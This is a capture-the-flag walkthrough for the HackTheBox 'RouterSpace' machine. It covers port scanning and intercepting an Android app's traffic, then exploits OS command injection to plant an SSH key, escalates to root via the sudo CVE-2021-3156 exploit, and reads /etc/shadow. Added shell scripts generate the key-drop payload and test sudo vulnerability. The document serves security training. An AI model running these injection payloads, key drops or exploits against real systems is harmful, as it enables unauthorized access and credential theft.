RouterSpace HackTheBox WalkThrough
This is the RouterSpace HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the RouterSpace HackTheBox machine. Before starting, a few facts about the box: it runs Linux, its IP address is 10.10.11.148, and its maker rated it Easy.
First of all, connect your PC to the HackTheBox VPN and confirm connectivity with the RouterSpace box by pinging its IP 10.10.11.148. If the host replies, start hacking. As usual, I began by scanning the machine. Scanning tells us how to proceed: it grabs the banners of the services listening on the open ports, and sometimes it already points at a vulnerability. As usual I used nmap [a popular port scanner] for this task; the result is given below: –
Scanning
$ nmap -p- --min-rate=10000 -oN fulltcp-scan.nmap 10.10.11.148 # sweep all 65535 TCP ports quickly
$ sudo nmap -p22,80 -sV -sC -oN ScriptScan.nmap 10.10.11.148 # version detection and default scripts on the open ports only
———-SNIP———
Nmap found ports 22 and 80 open. OpenSSH 8.2p1 is running on port 22 and a Node.js server on port 80 [which I only confirmed after getting inside the RouterSpace box]. Before enumerating this machine, let us add the routerspace.htb host to our hosts file. The advantage is that if name-based virtual hosting is enabled, requests carrying that hostname in the Host header may be served a different website to enumerate. The hosts file is /etc/hosts on our Kali/Parrot machine.
Host File After Modification
$ cat /etc/hosts
Since the web server is running on port 80 we have two URLs to check, viz. http://10.10.11.148 and http://routerspace.htb. Visiting each URL separately returned the same web page, which confirms that this server does not serve a different site for that hostname. We are free to use either URL while hunting; I will use http://routerspace.htb throughout the walkthrough.
At http://routerspace.htb I found a download button for an APK file named RouterSpace.apk. I downloaded it; we will reverse engineer it if nothing interesting turns up on http://routerspace.htb itself.
I performed a directory bruteforce with dirsearch using the wordlist directory-list-2.3-medium.txt, and a vhost bruteforce with gobuster using the wordlist subdomains-top1million-110000.txt, but found neither any special directory nor any virtual host. I also checked the page source of the webpage at http://routerspace.htb for some kind of hint but did not get anything interesting. So far nothing helped me to proceed further.
As we have already downloaded the APK file, let us install it in an Android emulator and play with it. I am going to use anbox, an open-source Android emulator for Linux. I used this link for the installation of anbox on my Kali OS.
Install & Configure AnBox
$ sudo apt install anbox
$ sudo modprobe ashmem_linux # kernel modules anbox needs; /sbin/modprobe is the same command
$ sudo modprobe binder_linux
$ wget https://build.anbox.io/android-images/2018/07/19/android_amd64.img # Android image the container boots
$ sudo mv android_amd64.img /var/lib/anbox/android.img
$ sudo service anbox-container-manager restart
$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
We have successfully installed the anbox emulator. Now let us install the adb tool, with which we will access the emulator and install the RouterSpace.apk app into it, and also configure the proxy setting so we can capture the requests of the RouterSpace application.
Installing adb & Configuring Proxy
$ sudo apt install adb
————-SNIP————-
$ adb devices # To list the attached devices
$ adb -s emulator-5558 install ~/Downloads/RouterSpace.apk # To install RouterSpace apk
$ adb -s emulator-5558 shell settings put global http_proxy 192.168.250.1:8081 # To configure burp proxy
We have set the proxy to 192.168.250.1:8081, where 192.168.250.1 is the gateway address of the anbox0 interface (the emulator reaches the host through it) and 8081 is the port where Burp Suite will be listening. Also configure the Burp Suite proxy listener on port 8081 as shown in the screenshot given below.
If you have trouble finding the gateway address of your anbox interface to bind Burp Suite to, you can configure the Burp Suite proxy to listen on all interfaces as shown in the screenshot given below. That also works, but then any host that can reach your machine can use the listener too, so prefer binding the single address when you can.
Once everything is configured, launch the anbox manager with the command below or simply by searching for anbox in the start menu.
$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
Turn on intercept in Burp Suite and open the RouterSpace application. Click on the Check Status button.
Note: If you get a connection error and anbox is taking too long to start, you can restart the anbox container manager service with the command below. This can resolve the start problem.
$ sudo service anbox-container-manager restart
After intercepting the request I found an IP address in the JSON body. This reminded me of the Command Injection vulnerability I had previously exploited in the DVWA web application. I have also written a post on DVWA Command Injection; read it here for more on the Command Injection vulnerability.
After trying some basic command injection payloads I found that the parameter is vulnerable to OS Command Injection.
Confirming OS Command Injection
Simply append the string ;id to the IP address 0.0.0.0 in the request body and the response contains the output of id for the user paul. The semicolon terminates the original command and the server runs id as a second command, which shows that the address is spliced unsanitised into a command string that a shell parses.
Getting User Shell
Now that we have confirmed OS Command Injection, my next step was to get a reverse shell on my Kali machine using some one-liner. I tried different one-liners but none of them worked [you can generate multiple one-liners from here]. This may be because nc, curl, wget and bash were not allowed to communicate with a remote address. I did not know exactly what the issue was.
So instead I pasted my SSH public key into the authorized_keys file of user paul, and with the matching private key I got a user shell.
Note: If the authorized_keys file (or the .ssh directory) does not exist, create it. Keep the directory mode 700 and the file mode 600; sshd ignores an authorized_keys file that other users can write to.
$ ssh-keygen -f key # on Kali: creates the private key "key" and the public key "key.pub"
$ cat key.pub
$ echo 'ssh-rsa ... deepak@kali'>>/home/paul/.ssh/authorized_keys # on the target, sent through the command injection after the IP
$ chmod 600 key # ssh refuses a private key that is readable by others
$ ssh -i key paul@10.10.11.148
$ whoami && id
We have successfully got a user shell as paul. Let us capture the user flag from the user.txt file.
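The two steps above, the ;id confirmation and the SSH key drop, as an added example that is not part of the original writeup: a small POSIX shell script showing why a semicolon appended to the address executes a second command (the value ends up in a string that a shell parses), what a fixed handler would do instead (reject anything that is not a dotted-quad address and pass it as a single argv element), and how to turn the confirmed injection into an authorized_keys drop with the ~/.ssh permissions sshd expects. The "echo checking" stand-in is an assumption: the writeup does not show which command the Node.js server actually runs with the address, nor the JSON field name, so the payload produced here is the raw string to append after the IP in the intercepted request.

```shell
#!/bin/sh
# Added example (not from the RouterSpace writeup): the mechanics behind ";id",
# the server-side fix, and the SSH key drop payload once injection is confirmed.

# is_ipv4 ADDR -> 0 if ADDR is exactly four dotted decimal octets 0-255, else 1.
# This is the allowlist check the vulnerable handler is missing.
is_ipv4() {
    addr=$1
    case $addr in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$addr" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# run_via_shell ADDR -> what a handler that builds a command string does: the
# string is handed to a shell, so ';', '|', '&&', '$(...)' in ADDR are
# interpreted. "echo checking" stands in for the real command the server runs
# with the address (assumption; the writeup does not show that command).
run_via_shell() {
    sh -c "echo checking $1" 2>&1
}

# run_as_argv ADDR -> the safe shape: ADDR is one argv element and is never
# re-parsed, so the same payload comes back as a literal string.
run_as_argv() {
    printf 'checking %s\n' "$1"
}

# check_status ADDR -> the fixed handler: validate first, then pass as argv.
check_status() {
    if is_ipv4 "$1"; then
        run_as_argv "$1"
    else
        printf 'rejected: not an IPv4 address: %s\n' "$1" >&2
        return 1
    fi
}

# key_drop_payload PUBKEY_FILE -> the string to append after the IP in the
# intercepted request: creates ~/.ssh if needed, appends the key, and sets the
# modes sshd's StrictModes insists on (a writable authorized_keys is ignored).
key_drop_payload() {
    key=$(cat "$1") || return 1
    printf ";mkdir -p ~/.ssh; echo '%s' >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys\n" "$key"
}

# Demonstration on the payload from the writeup.
payload='0.0.0.0;id'
echo "--- via shell (vulnerable): id runs as a second command"
run_via_shell "$payload"
echo "--- as argv (safe): the payload stays literal"
run_as_argv "$payload"
echo "--- fixed handler: validation rejects it"
check_status "$payload" || true
```

Run it as a normal user; the only command it executes from the payload is id. To use key_drop_payload for real, paste its output after the IP in Burp Suite's intercepted request, then log in with the private key as the writeup does.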
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector. We can find one either manually or with post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh and many more. This time I will go with LinPEAS, i.e. the script enumeration approach.
Finding PrivEsc Vector
LinPEAS flagged the Sudo version as vulnerable. After googling Sudo 1.8.31 exploit, I found that Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow [CVE-2021-3156], which allows privilege escalation to root via sudoedit -s and a command-line argument that ends with a single backslash character. Note that the version string alone can mislead, because distributions backport the fix without changing the version that sudo --version reports; the Qualys advisory describes a behavioural test that settles it. For more details about this vulnerability check this article from Qualys; a working exploit can be found here. When I tried to escalate privileges using the exploit at the latter link, I easily got a root shell. So our PrivEsc vector is privilege escalation by exploiting a vulnerable Sudo version.
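Before building an exploit, two checks that settle whether this sudo is actually affected, as an added example that is not from the writeup: a version-range check using the affected ranges from the Qualys advisory (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, fixed in 1.9.5p2), and the advisory's behavioural test, which matters because distributions backport the fix without bumping the version that sudo --version prints. The output patterns matched (an error starting with sudoedit: versus one starting with usage:) are the ones the advisory describes; the sample version output in the test is constructed.

```shell
#!/bin/sh
# Added example (not part of the writeup): decide whether a sudo is affected by
# CVE-2021-3156 without running the exploit.

# parse_sudo_version TEXT -> the version token from `sudo --version` output,
# e.g. "Sudo version 1.8.31" -> "1.8.31".
parse_sudo_version() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# version_key VERSION -> one integer that orders MAJ.MIN.PATCHpN versions, so
# "1.8.31p2" -> 1083102 and "1.9.5" -> 1090500. Fails (status 1) on junk.
version_key() {
    v=$1
    maj=${v%%.*};      rest=${v#"$maj"};     rest=${rest#.}
    min=${rest%%.*};   rest=${rest#"$min"};  rest=${rest#.}
    patch=${rest%%p*}; p=${rest#"$patch"};   p=${p#p}
    [ -n "$min" ]   || min=0
    [ -n "$patch" ] || patch=0
    [ -n "$p" ]     || p=0
    case "$maj$min$patch$p" in
        ''|*[!0-9]*) return 1 ;;
    esac
    echo $((maj * 1000000 + min * 10000 + patch * 100 + p))
}

# sudo_version_affected VERSION -> 0 if VERSION is in an affected range
# (legacy 1.8.2 .. 1.8.31p2 or stable 1.9.0 .. 1.9.5p1), 1 if not, 2 if
# the string could not be parsed.
sudo_version_affected() {
    k=$(version_key "$1") || return 2
    if [ "$k" -ge 1080200 ] && [ "$k" -le 1083102 ]; then return 0; fi
    if [ "$k" -ge 1090000 ] && [ "$k" -le 1090501 ]; then return 0; fi
    return 1
}

# sudoedit_behaviour -> "vulnerable", "patched" or "unknown", using the test
# from the Qualys advisory (run as an unprivileged user): a patched sudoedit
# rejects "-s /" with its usage text, an unpatched one accepts the option and
# fails later with "sudoedit: /: not a regular file".
sudoedit_behaviour() {
    command -v sudoedit >/dev/null 2>&1 || { echo unknown; return 0; }
    out=$(sudoedit -s / 2>&1) || true
    case $out in
        sudoedit:*) echo vulnerable ;;
        usage:*)    echo patched ;;
        *)          echo unknown ;;
    esac
}

# Report on the local sudo, if there is one.
if command -v sudo >/dev/null 2>&1; then
    local_version=$(parse_sudo_version "$(sudo --version 2>/dev/null)")
    if sudo_version_affected "$local_version"; then
        echo "sudo $local_version is in an affected range; behavioural check: $(sudoedit_behaviour)"
    else
        echo "sudo $local_version is outside the affected ranges (or could not be parsed)"
    fi
else
    echo "no sudo on this host"
fi
```

On the box the version check alone would say 1.8.31 is affected; the behavioural check is what tells a genuinely unpatched build apart from a distribution build that carries the fix under the same version number.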
Simply create three files named hax.c, lib.c and Makefile, put the content from this exploit into the respective files, and finally run make as shown below.
$ nano hax.c
$ nano lib.c
$ nano Makefile
$ ls
$ make # builds the sudo-hax-me-a-sandwich binary and the helper library
$ ./sudo-hax-me-a-sandwich 1 # 1 selects the target profile matching this box's sudo 1.8.31 build
# whoami && id
We have successfully got root shell. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the RouterSpace HackTheBox machine. I learnt a lot during this walkthrough and hope you also learnt something new. Thanks for reading this writeup. Share your experience in the comment section. If you want to give any suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.
Dumping Root Hash
# cat /etc/shadow | grep root